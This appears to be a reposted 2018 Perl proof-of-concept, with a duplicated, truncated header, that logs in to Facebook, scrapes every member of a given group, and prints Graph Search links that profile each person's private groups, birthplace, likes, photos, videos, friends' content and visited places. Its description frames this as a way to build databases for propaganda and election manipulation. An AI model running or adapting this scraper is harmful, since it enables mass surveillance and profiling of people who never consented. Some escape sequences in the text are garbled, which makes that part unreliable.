#!/usr/bin/perl
#
# Facebook (facebug) 'Graph' Groups crosswalk user's
# metadata mapping weakness (Demo PoC)
#
#
# 2018 Todor Donev <todor.donev at gm #!/usr/bin/perl
#
# Facebook (facebug) 'Graph' Groups crosswalk user's
# metadata mapping weakness (Demo PoC)
#
#
# 2018 Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# Description:
# Criminal hacker (CRACKER) can take advantage of
# this weakness by creating a specialized database
# to manipulate the humans (facebook users) with
# fake news, misinformation, propaganda or influence
# elections.
#
# See Also:
# https://en.wikipedia.org/wiki/Schema_crosswalk
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install HTTP::Cookies
# cpan install WWW::Mechanize
#
#
# I know that is buggy but is only conceptual tool
# which demonstrate exploitation of this weakness.
#
#
# Facebook answer:
# Hi Todor,
#
# Thank you for contacting us. Unfortunately what
# you have described is not currently covered by
# this program. Please see
# https://www.facebook.com/data-abuse/terms/ for
# more information about what is currently in scope
# of this program. We will follow up with you
# regarding any questions we may have. For any other
# questions or concerns, please visit our Help Center:
# https://www.facebook.com/help.
#
# Thanks,
#
# Amber Serrano
# Developer Operations
#
# Data Abuse Bounty is useless when this door is widely
# opened for criminal abusing.
#
# Now this weakness is patched..
#
# Buggy, Buggy, Buggy.. :)
#
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
use open ':std', ':encoding(UTF-8)';
my $un = ''; # facebook login
my $pw = ''; # facebook password
print "Facebook (facebug) 'Graph' Groups crosswalk metadata mapping weakness (Demo PoC)
";
print "[ Website: https://ethical-hacker.org
";
print "[ Author: Todor Donev <todor.donev at gmail.com>
";
die "Usage: perl $0 <Group ID>
" unless (scalar @ARGV)==1;
my $mech = WWW::Mechanize->new();$mech->cookie_jar(HTTP::Cookies->new());
$mech->agent_alias('Linux Mozilla');
$mech->get("http://m.facebook.com/login.php");
$mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw});
die "Error: $!
" if !$mech->content() =~ /post_form_id"svalue="(w+)"/;
foreach my $gid (@ARGV){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid");
printf "$1 " if ($mech->content() =~ m/<title>(.*)</title>/g);
for (my $j = 0; $j <= 100000; $j += 30){
$mech->get("https://m.facebook.com/browse/group/members/?id=$gid&start=$j&listType=list_general");
die "[ No results found
[
[ ==========================
" if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.}));
if (my @profiles = ($mech->content() =~ m/<div><h3><a href="/(.*?)">(.*?)</a></h3>/g)){
if (my @userid = ($mech->content() =~ m/id="member_(.*?)">/g)){
while (@profiles || @userid) {
my $fburl = shift @profiles;
my $name = shift @profiles;
my $pid = shift @userid;
printf "x1bx5b0;32m[x1bx5b0m User ID: x1bx5b0;35m $pid x1bx5b0m Name/Profile: x1bx5b1;36m $name x1bx5b0m x1bx5b1;31m=>x1bx5b0m https://www.facebook.com/x1bx5b0;36m$fburl x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Which facebook groups the person joined:x1bx5b0;33m https://www.facebook.com/search/$pid/groups x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Which private facebook groups the person joined:x1bx5b0;33m https://www.facebook.com/search/$pid/groups-privacy x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Where the person is bornd:x1bx5b0;33m https://www.facebook.com/search/$pid/users-birth-place x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Posts that the person commented on:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-commented x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Posts that the person like:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-liked x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m In which posts is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-tagged x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Posts by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/stories-by x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Photos maded by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-by x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Posts that the person like:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-in x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Which photos does this person like:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-liked x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Photos made of this person:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-of x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m In which photos is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-tagged x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What photos did the person comment on:x1bx5b0;33m https://www.facebook.com/search/$pid/photos-commented x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What photos did the friends upload:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What photos did the friends tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What photos maded by the person's friends:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-of x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Photos by the person's friends:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/photos-by x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Videos made of this person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-of x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Videos maded by the person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-by x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m In which videos is this person:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-in x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Which videos does this person like:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-liked x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m In which videos is this person tagged:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-tagged x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What videos did the person comment on:x1bx5b0;33m https://www.facebook.com/search/$pid/videos-commented x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m What videos did the friends upload:x1bx5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m All visited places:x1bx5b0;33m https://www.facebook.com/search/$pid/places-visited x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m Which people are following:x1bx5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid x1bx5b0m
";
printf "x1bx5b0;32m[x1bx5b0m
";
}
}
}
}
}
Facebook Graph Groups Crosswalk User Metadata Mapping Weakness
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 397